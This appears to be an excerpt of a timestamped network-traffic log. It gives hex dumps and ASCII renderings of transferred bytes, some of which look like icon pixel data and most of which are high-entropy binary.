                                                                                              2021-12-07 12:39:06 UTC148INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 7b ce df 4a 7b ce ff 49 7b ce fe 49 7b ce fe 49 7b ce fe 49 7b ce fe 49 7b ce fe 49 7b ce fe 49 7a cd fe 48 79 cc fe 48 79 cd ff 48 79 cc fe 48 79 cc fe 48 79 cc fe 48 79 cc fe 48 79 cc fe 48 79 cc fe 48 79 cc fe 48 79 cc fe 48 79 cd ff 48 79 cc fe 48 79 cc fe 48 79 cc fe 48 79 cc fe 48 79 cc fe 48 79 cc fe 48 79 cc fe 48 79 cc fe 48 79 cc fe 48 79 cd ff 48 79 cc fe 48 79 cd fe 49 7b ce fe 49 7b ce fe 49 7b ce fe 49 7b ce fe 49 7b ce fe 49 7b
                                                                                              Data Ascii: I{J{I{I{I{I{I{I{IzHyHyHyHyHyHyHyHyHyHyHyHyHyHyHyHyHyHyHyHyHyHyHyI{I{I{I{I{I{
                                                                                              2021-12-07 12:39:06 UTC156INData Raw: ff 42 42 e0 fe 43 43 e0 fe 43 43 e1 fe 43 43 e1 fe 44 44 e1 fe 44 44 e2 fe 45 45 e2 fe 45 45 e2 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 4c e9 01 4c 4c e9 a1 4b 4b e8 fe 4a 4a e8 fe 4a 4a e7 fe 49 49 e6 fe 48 48 e6 fe 48 48 e5 fe 47 47 e5 ff 46 46 e4 fe 46 46 e3 fe 45 45 e3 fe 44 44 e2 fe 44 44 e1 fe 43 43 e1 fe 43 43 e0 fe 42 42 e0 fc 41 41 df 53 00 00 00 00 3f 3f
                                                                                              Data Ascii: BBCCCCCCDDDDEEEEfLLLLKKJJJJIIHHHHGGFFFFEEDDDDCCCCBBAAS??
                                                                                              2021-12-07 12:39:06 UTC164INData Raw: ff 3b 68 b6 ff 3b 69 b8 ff 3b 6a ba ff 3c 6a bb ff 3c 6b bb ff 3b 6a bb ff 3b 6a b9 ff 3b 69 b7 ff 3a 67 b4 ff 3a 66 b2 f3 3a 66 b2 a4 3a 66 b2 3d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 67 b3 08 3b 67 b3 7e 3b 67 b3 f1 3b 69 b7 ff 3c 6c bd ff 3d 6e
                                                                                              Data Ascii: ;h;i;j<j<k;j;j;i:g:f:f:f=;g;g~;g;i<l=n
                                                                                              2021-12-07 12:39:06 UTC172INData Raw: 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 86 d8 3d 54 86 d8 d2 54 86 d8 ff 54 86 d8 ff 54 86 d8 ff 54 86 d8 ff 54 86 d8 ff 54 86 d8 ff 54 86 d8 ff 54 86 d8 ff 54 86 d8 ff 54 86 d8 ff 54 86 d8 ff 54 86 d8 ff 54 86 d8 ff 54 86 d8 ff 54 86 d8 ff 54 86 d8 ff 54 86 d8 f8 54 86 d8 89 54 86 d8 09 00 00
                                                                                              Data Ascii: .T=TTTTTTTTTTTTTTTTTTTT
                                                                                              2021-12-07 12:39:06 UTC180INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff e0 03 ff ff ff ff ff ff 00 00 ff ff ff ff ff fc 00 00 3f ff ff ff ff f8 00 00 0f ff ff ff ff f0 00 00 07 ff ff ff ff e0 00 00 03 ff ff ff ff c0 00 00 01 ff ff ff ff 80 00 00 01 ff ff ff ff 00 00 00 00 ff ff ff ff 00 00 00 00 7f ff ff fe 00 00 00 00 7f ff ff fe 00 00 00 00 3f ff ff fe 00 00 00 00 3f ff ff fc 00 00 00 00 3f ff ff fc 00 00 00 00 3f ff ff fc 00 00 00 00 1f ff ff fc 00 00 00 00 1f ff ff fc 00 00 00 00 1f ff ff fc 00 00 00 00 1f ff ff fc 00 00 00 00 1f ff ff fc 00 00 00 00 1f ff ff fc 00 00 00 00 3f ff ff fc 00 00 00 00 3f ff ff fe 00 00 00 00 3f ff ff fe 00 00 00 00 3f ff ff fe 00 00 00 00 7f ff ff ff 00 00 00 00 7f ff ff ff 00 00 00 00 ff ff ff ff 80 00 00 00 ff ff ff ff c0 00 00 01
                                                                                              Data Ascii: ?????????
                                                                                              2021-12-07 12:39:06 UTC187INData Raw: 2b 74 4d 3a 75 6c 1b ed 19 b6 26 7b 39 8e ad e5 b7 02 c9 df 2b d1 27 36 01 e9 73 b7 f5 76 a0 78 1b 1d dd 1e 91 30 95 bb 36 15 2d ad 2d a0 67 39 b1 34 c2 6f 5c 74 57 b4 f3 00 31 ca 01 c8 85 a0 b4 fc bd d3 b3 fc 0c 55 e3 b8 ae ae ad c9 da 40 2e 02 9e d5 71 f1 a0 88 91 00 70 b1 ae ea 3f 6f 1f 3e a3 00 b5 e0 3a 2e 09 4b db 5a 82 1f c3 08 40 64 b8 48 c7 45 45 04 44 4c f3 af 15 11 44 44 d3 aa c2 6a 99 86 8b 06 4a cc 04 20 f8 10 c0 75 4d f8 bf 50 c4 75 51 09 2d f9 ea 8b 75 5c 34 48 e2 24 00 e7 e8 b8 a8 57 d5 6a 14 60 21 b8 22 ba 86 ab b4 dc 33 41 12 8b 3b f3 3f 6e bd b2 2b 3f ff 3f 58 84 d8 ae f4 53 6f 92 ba 26 08 89 9c fc 91 bb 77 44 76 0f c1 b8 44 00 e7 e8 48 00 8a e9 fb d7 0d 71 75 e5 01 38 87 08 27 02 e3 22 00 1f d0 71 51 11 89 49 8c 15 04 da 46 52 ce c2 08
                                                                                              Data Ascii: +tM:ul&{9+'6svx06--g94o\tW1U@.qp?o>:.KZ@dHEEDLDDjJ uMPuQ-u\4H$Wj`!"3A;?n+??XSo&wDvDHqu8'"qQIFR
                                                                                              2021-12-07 12:39:06 UTC195INData Raw: 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 51 82 d3 0f 53 85 d8 aa 54 86 d8 fe 54 86 d8 ff 54 86 d8 ff 54 86 d8 fe 54 86 d8 ff 54 86 d8 ff 54 86 d8 fe 54 86 d8 ff 54 86 d8 ff 54 86 d8 fe 54 86 d8 ff 54 86 d8 ff 54 86 d8 fe 54 86 d8 ff 54 86 d8 de 53 85 d7 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: XQSTTTTTTTTTTTTTTTS9
                                                                                              2021-12-07 12:39:06 UTC203INData Raw: ff 47 47 e4 87 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 30 91 05 4e 4e eb b8 4c 4c e9 ff 4b 4b e8 ff 49 49 e7 ff 48 48 e5 ff 46 46 e4 ff 45 45 e2 fe 43 43 e0 63 00 00 00 00 00 00 00 00 2c 2c 98 06 43 43 e1 c0 44 44 e1 ff 45 45 e2 ff 46 46 e3 ff 47 47 e4 ff 47 47 e5 ff 48 48 e6 fe 48 48 e4 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 29 29 7a 01 4f 4f ec a3 4e 4e eb ff 4c 4c e9 ff 4b 4b e8 ff 49 49 e7 ff 48 48 e5 ff 46 46 e4 ff 45 45 e2 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 36 b3 12 45 45 e3 d9 46 46 e4 ff 47 47 e5 ff 48 48 e5 ff 49 49
                                                                                              Data Ascii: GG00NNLLKKIIHHFFEECCc,,CCDDEEFFGGGGHHHH_))zOONNLLKKIIHHFFEE66EEFFGGHHII
                                                                                              2021-12-07 12:39:06 UTC211INData Raw: f3 3b 0b 07 67 9a cf d2 b5 ef 1e 9b d9 7e 7e 7f b5 cf 5f 7e 18 e7 9f da ae 7f b1 c5 f7 1d 7b 86 8c bb bf f6 cf 9b 66 86 af 65 57 0b 57 bc 75 a6 d9 ee 77 35 b4 5d 0b d5 9c d9 c9 d3 3b 65 a7 fc 7f 29 13 23 e2 e7 81 1a 93 ef 9d 1d 8e 67 cf 37 8c 79 15 d4 87 66 9b f3 df b7 1a fa bd b1 ff 3d 2d f4 fd ad d9 cd 5c e3 91 d9 66 1e f2 27 b3 cd ef bf 5c 52 9f 91 fd 15 3c f3 a5 d9 75 1c d3 fd 9e 68 59 e7 f5 2d fb 62 ad b2 7f 9a dd c1 c8 9d f2 ca 39 fb be 01 8e f9 c3 e6 21 fb 6b df 3e 3b d7 f0 dd d9 5c b3 cf eb 7e 77 cd 0d 5f 4b 30 37 da 3a d1 08 67 8e 07 6a ee 16 cd 0d e7 36 77 cf 35 f3 e4 0f ce 35 7f 87 39 53 e3 c4 43 f0 cc ef cc 6d 7c 8f ec d1 b9 e6 b5 68 db 7d 65 6e 07 0b 76 ca 4e d9 29 3b 65 a7 fc df fc 1e 5d e7 bf cf ee 1b 9e 97 f4 bb 83 0f c2 d0 7f b9 af be f1
                                                                                              Data Ascii: ;g~~_~{feWWuw5];e)#g7yf=-\f'\R<uhY-b9!k>;\~w_K07:gj6w559SCm|h}envN);e]
                                                                                              2021-12-07 12:39:06 UTC219INData Raw: 90 6a d5 63 31 c6 59 b9 4f 8e 92 51 9a d2 ed b5 41 83 fd 1f 0f f5 df 88 95 2f f8 65 2a 1b 02 26 98 b4 08 ea 3f c7 24 8f 7c d4 7f ab 8a f7 70 0b 6e 46 85 59 09 9f 69 58 78 f6 5c ad c8 b8 23 32 c3 9f d4 a7 32 f5 45 f5 3a dd 0f 76 3c 8a ad 62 a6 b9 a6 58 25 bc 8b 48 70 38 2a 4e 93 fd e2 cc 16 dd 97 c2 59 93 f5 5b 34 ce 77 b2 29 3d 26 27 34 fd fa 79 71 8f a7 cb 1c 24 fa 72 7d 7d cb b2 b5 64 17 6d 77 29 bd f5 a8 ce bc a2 49 d9 cd 6d 3d f7 c2 90 5f 6e bd 23 e2 58 13 66 5c 2c 73 bc 3e 9b 37 67 b6 56 c4 ec 59 27 62 2e ab e5 f2 f5 a2 0d 15 1d 17 5b 9a bd 36 df 2c e5 15 e1 41 77 3a bb 2a b3 32 ca dd 87 b5 ad ba d9 4c 68 57 f2 8f a3 62 ad 2f 3e 9d 16 5e 6c c5 e2 44 e6 6e af 09 fe bd d0 5b 7b 94 88 26 fd 6a 46 b9 d8 6b 85 b8 ea 9b 4b e8 f2 f3 4f 59 72 19 42 aa c6 a7
                                                                                              Data Ascii: jc1YOQA/e*&?$|pnFYiXx\#22E:v<bX%Hp8*NY[4w)=&'4yq$r}}dmw)Im=_n#Xf\,s>7gVY'b.[6,Aw:*2LhWb/>^lDn[{&jFkKOYrB
                                                                                              2021-12-07 12:39:06 UTC227INData Raw: ec b5 a3 d4 fc 43 fc c6 3d 49 7f db 49 c1 26 1d e1 26 55 39 8a 46 67 bf 99 dd 4c e8 3f 02 fe df e7 6c b5 5e ec 81 ec f2 db 2d 8c 05 67 d6 c9 3f 78 b5 d5 b3 a3 35 e4 ec 02 61 e5 39 15 fd e8 ff 52 36 da 7a 3d 75 73 5f 75 38 c3 d6 f4 dd 85 8e e8 eb cb 67 94 d2 37 8c 3a 60 e9 41 f1 5f a7 39 26 21 db 9c 96 69 2d e3 f8 b3 72 9f d8 ff b7 fd 07 ab de ff be ff 20 35 80 ff de 5e ba 0c 03 f8 87 49 ee d7 7b e1 2c 98 7f bc 56 0f 1f 99 7b 71 52 13 95 ff ce 5f cd 65 17 5c 90 e4 1c a4 e6 1f 35 77 4d 35 f2 8a 48 fd 77 61 42 d3 06 f1 6d fe be 1b c7 b4 69 cd 3d f9 f9 f4 3f fb 1f bf 51 ff 7c d7 3a ec b6 be 7f 0c eb 78 98 60 fe 33 6b f7 51 46 40 af c6 4e 6a fe 91 76 d3 57 71 96 cf 16 33 1e ec 2f 22 3f 1a fa b7 a5 c4 fe 1f dc ae 37 bb 96 9b 25 3f 7f eb d3 ba f7 c1 0e 61 8b 9f
                                                                                              Data Ascii: C=II&&U9FgL?l^-g?x5a9R6z=us_u8g7:`A_9&!i-r 5^I{,V{qR_e\5wM5HwaBmi=?Q|:x`3kQF@NjvWq3/"?7%?a
                                                                                              2021-12-07 12:39:06 UTC234INData Raw: 7f 15 fc cf 49 f0 3f 4b a1 ff 0c b4 7d e2 1d 9b 54 a1 79 26 6a 7b b9 73 c7 3b 32 ff 5a 37 30 ff 9a 2d 36 8f 3e fd 8f f9 d7 e5 01 fc 33 e1 ff 7d ed 01 64 fe df 3d 10 ff 6c 4b 36 6a 1a ff 31 ff bf 32 90 ff 1b 80 bf 2a 6d 32 e1 7f 47 0e f0 ff 15 e1 3b 0a 25 ff e0 ff 4f 0d d4 7f ef d1 ff a9 e7 55 13 fb 1f 1d e0 ff bb 19 5d b1 dd 7f f0 ff 87 06 fa 7f 0e de 7f 2a 8d 5d 56 d0 45 e3 69 f7 df 8b 78 d5 36 2d a6 08 fc 67 23 23 4f 51 68 90 ff 3c 08 fd e3 86 cc 8d c0 6f 8c f8 cf 96 97 4c 1e 12 5f d4 ca 76 f0 17 ae b6 91 e2 54 15 9c aa a9 b1 5d eb 3d 2b a9 40 b3 33 ca b5 dc b3 23 2b 6e aa f9 6c fa e5 c8 53 96 e6 ee 2f 55 17 8a d5 30 54 e4 fd 1d bd a5 0e 49 97 02 ff 24 e0 37 ff a5 ff 99 66 1d 5b 68 72 e8 7b eb 84 e9 56 9b d2 07 f0 53 fc 87 db 7b 41 fd c3 8e f8 a3 fe 61
                                                                                              Data Ascii: I?K}Ty&j{s;2Z70-6>3}d=lK6j12*m2G;%OU]*]VEix6-g##OQh<oL_vT]=+@3#+nlS/U0TI$7f[hr{VS{Aa
                                                                                              2021-12-07 12:39:06 UTC242INData Raw: 8d d6 49 0e 16 c2 6d 36 29 9c 55 f0 ff ef 88 7f 71 49 89 b0 3f 35 ff 10 cc ff 74 c1 ff ff 72 5f 05 fc eb 89 fe 81 9a 7f 0b f8 ff 66 f0 3f 73 31 ff 1e 81 f8 b7 0d f1 cf 13 fc d7 02 f0 5f 14 ff 97 81 f8 d7 07 ff 77 e5 d6 e2 fd 4f 56 d9 89 fc 37 0e f8 7b 31 ff bc 8a f8 cf 24 f5 ff 21 82 ff 2e f8 7f 3d e0 ff cf f9 77 39 fc df 04 f3 8f a1 f6 6c bc 7f 96 ef 3a 06 43 eb 3b ab d0 45 01 fd 8f 28 89 7f 92 a8 ff e7 b8 25 f4 f3 d0 ff e1 fe 3f b9 ff 35 1a f3 ff 8d a4 ff b7 61 2c 22 f3 5f 57 c2 ff b9 92 fe bf 14 f3 8f 61 e0 bf 52 c0 7f 8d 22 fd 0f c5 7f ec c6 fc 23 06 fc cf 35 f4 7f b9 64 fe 47 cd 7f 52 d0 ff 4c 8f 3c 87 f8 b7 0a f1 cf 16 f8 0f 38 ea 12 fe 5f 70 ff c0 1c f1 df bd 25 93 b9 a6 dd 8d ff de 7e 0d ea ff f1 c6 55 fa 86 a8 7f c7 a1 ff 3b 02 ff 4f e7 c6 63 fe
                                                                                              Data Ascii: Im6)UqI?5tr_f?s1_wOV7{1$!.=w9l:C;E(%?5a,"_WaR"#5dGRL<8_p%~U;Oc
                                                                                              2021-12-07 12:39:06 UTC250INData Raw: ac 2b 84 b7 16 f3 1f 5a db e2 98 a1 e8 ff 28 fe 53 b8 93 9a ff de 45 fe 2f 1b dc ff 1c 46 e6 df 26 64 ff 75 13 de 3f 75 ff 67 3a ea 1f 6a ff 57 a0 ff 7a 8a fa 9f e2 7f 2e c3 fe e7 60 ff 1e f0 3f 6f c8 fe f3 12 b2 ff 70 6c 80 ff 29 42 fd f3 f7 fd 9b 10 f0 df 21 d8 7f 3b 05 fd e7 0d e8 1f 16 83 ff bb ae e2 de b0 2c e5 47 ad 0a d1 bf 68 83 ff 56 c1 fd 97 1a cc 3f a9 f9 bf a1 95 34 f6 3f b6 e2 ff 27 45 f8 7f 17 ee 9f 55 5a 5c 27 fd 7f 11 fa ff 9d d0 bf 3e 27 fb ef 94 fe 57 8d e8 bf 05 f7 4f 76 83 ff b2 c2 fc 6b 0b b9 7f 11 4e db 4a f6 3f 1b 91 ff fe c9 ff e9 24 ff 53 fa c7 5c a2 ff 5f 05 fd e3 2c dc 7f fa 0e fd 6f 04 f6 5f 26 c4 8f c4 ff b7 2f 84 5f a3 fe e9 86 ff 4f 81 ff 53 f7 6f 1a 08 ff e9 4a e6 df 2c d2 ff a8 0e f0 9f 87 11 ff 47 0c dc 3f 7a 42 ee 9f 51
                                                                                              Data Ascii: +Z(SE/F&du?ug:jWz.`?opl)B!;,GhV?4?'EUZ\'>'WOvkNJ?$S\_,o_&/_OSoJ,G?zBQ
                                                                                              2021-12-07 12:39:06 UTC258INData Raw: f0 7f ef 32 0d e0 3f 83 d2 51 f0 7f 58 80 f5 9f 91 bb dc 3e 98 1a dc 6a 8d f7 ef 03 f0 cf b3 c8 ff 99 f8 c7 ff be 9a e2 9f 64 ff 2d d0 ff 33 e7 9f 84 ff 56 4a f7 ff af fe f7 66 d8 ff ef 38 ff fe d0 3f 2d f5 0d 93 f1 80 fe 2b 81 a1 0c fc 7f 1a f8 cf 4c fe 3f e1 ff 39 51 ff 17 82 ff 6d a5 fc 6f 6b e0 3f 24 ff d0 1a fe 8f 57 a9 ff 41 09 e5 ff 13 fe c7 1b ea 7f 42 f8 df 31 34 ff 36 85 e6 df 09 b3 f2 6f 99 f8 27 f1 ff 24 fa c7 7f f2 ff f9 f0 ff 07 53 fd 77 11 f5 bf 23 f3 af bf f6 bf 22 b4 ff bd 89 fc bf 5a 3a ff 4d a6 fd 3f e9 ff 8c 68 fe e1 2b 3a ff 25 f9 87 8a 34 ff 91 e8 3f 49 ff 4f fc 6f ab 28 ff 4f 98 ce 7f 9b a9 ff 05 93 ff c0 cf ca ff 64 e2 7f cc fc eb 4b 34 ff cc 9d fa 5f ff 75 fe bf 02 f5 ef 9a 81 b7 c8 bf bd c0 bf 95 a7 0e f9 d7 1b 32 62 9d af 3a bb
                                                                                              Data Ascii: 2?QX>jd-3VJf8?-+L?9Qmok?$WAB146o'$Sw#"Z:M?h+:%4?IOo(OdK4_u2b:
                                                                                              2021-12-07 12:39:06 UTC266INData Raw: 3a ff b7 03 fe 69 46 f9 0f e3 e9 fc e7 3e 2b ff 6d 0f ed 7f 89 ff ed 52 96 fe 7b 09 4b ff f5 9c fa 7f 3c a4 f8 9f 2f ed ff 8e 50 ff 2b 6e ea 7f ea 03 fd ff 6f fc 8f 1d fc 17 a6 ff 35 f1 bf 30 73 be 03 fd 73 15 cd 3f 5d 44 fd 0f 3a 59 fe ef 4c fd cf 6b 16 ff 5f 16 f8 f7 1a ac ff 3c cd ff f5 a0 fc df 3c 9a ff 25 4f fd 3f 18 58 3f 27 f5 3f 22 f8 4f 05 fc 4f 17 50 fd 1b c9 7f 65 fa 7f 31 f3 3f 0f a1 ff dd 40 fd bf 27 53 fd 0f e1 3f 92 f9 ff 72 ea 7f 27 4f f5 0f 4c ff 63 92 7f dd c5 e2 ff 54 d1 f9 4f 26 c5 bf 88 ff 2b 59 3f 73 fe c3 cc 7f 10 fb 1f fa 67 f2 fe 6b 27 77 61 fd 07 59 f9 1f 89 ac fc 93 bd 34 ff f6 2a d5 3f e4 d0 fc 4f a6 ff 01 17 cd bf 55 82 ff 0f f1 7f 21 fa bf 61 8a ff ca 52 fc 7f 11 9d ff 18 52 ff 57 a6 fe 69 ce 1f ff af 85 c8 ff 20 fa 5f 73 9a
                                                                                              Data Ascii: :iF>+mR{K</P+no50ss?]D:YLk_<<%O?X?'?"OOPe1?@'S?r'OLcTO&+Y?sgk'waY4*?OU!aRRWi _s
                                                                                              2021-12-07 12:39:06 UTC273INData Raw: e2 bf af 28 ff 99 d4 3f 89 38 ff 0d d4 ff 9d f0 1f 99 e7 df 97 fa 3f 30 e7 1f 1b 80 ff 38 d0 f3 bf 88 9e ff bf df 7f db 7f 36 c0 ff de 91 e6 bf 87 43 ff e5 01 ff bb 2a bd b2 1e 27 59 5d e8 3f 8d 0c 2e 22 ff 6a 15 f2 4f ce 83 ff b2 0a f9 df 43 d0 bf 46 20 ff 8f 1b fc 9f f9 ac fc 07 61 3a ff ae a2 f8 37 e1 7f f2 d3 fc 07 63 9a ff 4b f8 5f 07 29 ff e3 03 9d 7f 30 f3 6f d8 a9 ff 41 1a 9d 7f 74 fe 8b ff 15 c0 11 29 dd c0 99 06 fe d3 58 f0 5f 3a da 3f 22 ff f6 ae c8 4b e4 bf 73 81 ff a1 0d fe 97 23 fc 7f 75 55 b8 83 5b 8c 07 d1 ff 5d a2 fe 5f ab e1 ff c5 87 fc d7 7c e4 bf 76 e3 fc 73 05 e4 23 ff f3 2a f8 1f 5f a0 ff 78 00 fd e7 39 c6 4d ab af f0 7f dd 87 fc a3 0b b7 be d6 ac 07 ff 63 16 f4 9f 44 ff f1 1b ff 53 ff c3 ff db 8a f7 6f 3a ea 1f 7d 5a ff 92 fc 1f 52
                                                                                              Data Ascii: (?8?086C*'Y]?."jOCF a:7cK_)0oAt)X_:?"Ks#uU[]_|vs#*_x9McDSo:}ZR
                                                                                              2021-12-07 12:39:06 UTC281INData Raw: 39 2b 25 2a a5 26 d3 f7 5f 94 e7 4d f0 fb 5e bf 3f ff 3f 59 bf ed c1 fe ee c3 f7 c7 70 f8 68 30 f9 bf 0d 26 0f 37 f8 57 bc fe 73 ff 91 f5 2b 6e 58 6e 34 dc a6 ac 28 cf 55 7a e8 f7 fa 4f 49 0f 75 aa fd 73 fd 21 07 f3 7c ca 97 e9 2e be df b2 f4 f7 fe 1b 73 be 3b 99 f5 af fd cf f6 91 c3 ff 3f 26 44 f9 cf f9 af b6 e4 55 91 f8 e7 f9 17 37 d4 5f f8 d9 87 ee 7f f4 e1 39 66 51 8d b7 a3 78 58 f8 17 d9 7f 76 6e 26 ff b3 f0 d0 22 1b e7 f7 3f 19 ff 5c ff 05 ac 3f 8b 59 ff 1b b8 0d 17 f0 cf 1e ee 58 c4 3c ff cc f5 ef b8 c0 fc ff 1f 98 be e7 38 3e 27 c8 5c bb 89 39 ff fe 7d ff 6d c2 fa 37 94 31 f7 7f c6 90 b9 62 7d 5c 4e 3d b9 ff 4d b0 fe 3b 38 ff 8f e7 32 d7 5f 84 ff 5f 34 55 ad a7 72 87 ff df ee bf fb 58 ff b0 07 f3 fe bb 7c cc bb fd 03 43 3e 44 87 85 ff 90 fb cf a8
                                                                                              Data Ascii: 9+%*&_M^??Yph0&7Ws+nXn4(UzOIus!|.s;?&DU7_9fQxXvn&"?\?YX<8>'\9}m71b}\N=M;82__4UrX|C>D
                                                                                              2021-12-07 12:39:06 UTC289INData Raw: 70 76 d4 76 7d 03 fe 13 b0 91 b7 36 8b d3 78 ea 85 74 09 a1 7b 9d 04 ff 89 b7 39 33 a7 e7 23 e6 7f 1b d4 a6 01 ff f8 9e 62 66 72 3b 67 77 c8 2e ee a0 59 e4 fe cb d7 3f 84 f3 7f dd f4 d9 d8 ed 1c 3b fb 0f 46 35 ea 57 9f d9 19 3f 11 f7 5f 5c be 3d c1 ff 17 77 b1 99 38 2e ec 35 7c d4 98 30 b1 49 aa 42 42 b3 72 8a 5b c9 5a e0 1f 85 e3 2f 9c 89 45 ff e7 8c fa cf d0 9f 31 d9 a0 d3 8d 8b 63 f6 b0 86 64 c8 24 82 ff bd 9c 78 d3 6b 9c 50 8b 4c 76 7d da b3 99 d7 a6 ee 1e e2 78 23 64 67 b3 38 6a 2d f4 0f f9 04 ff 32 d9 c8 0d fc 5b 66 51 f5 f6 8e 33 b3 13 2b e3 95 eb a7 9c c8 fb 71 1c fc 87 4d d7 ab 49 ff 93 34 1d fd 4f f2 76 f7 ad bf 1c ec 72 8f 72 4c cd 78 67 b1 e9 74 25 c1 3f 27 ad e4 cc e7 a8 6d da 87 fd 4f bb ba 51 81 93 fd 7e da 47 cd aa d9 72 8e 0a 7a d8 7f 3d
                                                                                              Data Ascii: pvv}6xt{93#bfr;gw.Y?;F5W?_\=w8.5|0IBBr[Z/E1cd$xkPLv}x#dg8j-2[fQ3+qMI4OvrrLxgt%?'mOQ~Grz=
                                                                                              2021-12-07 12:39:06 UTC297INData Raw: 17 73 2e 9e 6b fe 35 3e ff ba 70 6c f9 7d 4d 44 44 c4 26 bf 71 62 f7 4b de 3e 61 44 ad 06 fa 9f a4 9b 84 ff f6 bc 97 af e1 70 43 f1 91 ec 31 7c fb 64 a7 6d be 9e 54 7e 76 be 16 f8 0f 73 e1 ff f7 ec b0 db a7 c3 c0 3f f2 32 0f 57 7c 09 ba b0 20 e7 4a 83 7c c8 88 9a bb fd 9b 2c 95 4d 5f 3f 7e 5d c7 29 55 39 53 67 fe b3 15 94 ff b4 97 b3 11 f7 9f 73 ba fe 32 13 99 5e f7 c0 fb f5 2f e3 d5 f6 13 fe bb 42 d7 a5 8d 7e 7d 5d 53 c0 7f 55 1d 93 b8 65 dd d4 77 8f ab d5 76 4b 9e 36 3d 8e fe 57 82 ff de 35 3b 54 51 89 89 fe 58 bf d3 ec e5 e5 41 cf 17 15 66 1e a8 51 e6 3e e4 1f e6 07 fe 9b ea 7c 3d a2 ff 01 ff a3 37 1f ef 3f c7 96 99 61 11 f1 f3 2a 71 ff 5d 2b 76 e3 ee d0 0c dc b1 63 e3 e1 73 cf 17 6d d1 71 56 64 c3 fe ab 5b 1a a1 fe 0b 6e 64 fb 72 21 4a 22 14 ff ff a2
                                                                                              Data Ascii: s.k5>pl}MDD&qbK>aDpC1|dmT~vs?2W| J|,M_?~])U9Sgs2^/B~}]SUewvK6=W5;TQXAfQ>|=7?a*q]+vcsmqVd[ndr!J"
                                                                                              2021-12-07 12:39:06 UTC305INData Raw: 19 44 e2 21 ff e5 6b 61 37 f0 1f 8b 21 ff e0 98 32 39 dc ff 47 d4 70 c1 ff fe 12 e4 1f e8 fe 51 04 ff 47 9a 6b 50 ff 6e f6 40 fe 03 d4 7f 38 50 ff a9 a5 7f 89 b9 52 66 e1 c2 76 62 73 9d 10 ac b0 5d c3 ee 14 c4 b2 d8 8a b0 e0 a6 d5 7a a8 c1 fc 1b de 7f 7f f8 ff 4b a6 6c 79 cc a6 4f b6 62 84 16 ba cf 58 04 85 1d 33 e7 99 38 13 ac 4c 9f a3 d1 80 f7 e7 1a e0 7f 3d a1 12 27 21 ff e1 e5 3b 11 b8 ff bf 49 b5 01 fe 65 9d 8c fc ef 94 4f 41 ff e7 fa 1c fc 3f 55 d4 57 37 b8 05 21 ff a3 46 4b 6c a2 66 ff 42 8f c5 1f be 96 55 49 34 ff e8 eb 00 fd 43 dd 06 af 88 55 f6 d4 1f dc bd a7 90 7f f1 96 06 ed ff 00 97 8a 6d 33 e5 ca 61 a4 ff d4 30 01 fe 27 37 75 67 c3 8d 69 a3 0f c6 41 d7 61 fd 65 77 cf 7d 3f 88 a6 79 42 c8 bf 6f ee ad 0a fa 4f 4f b2 75 97 fd 66 1e 87 13 4c 7b
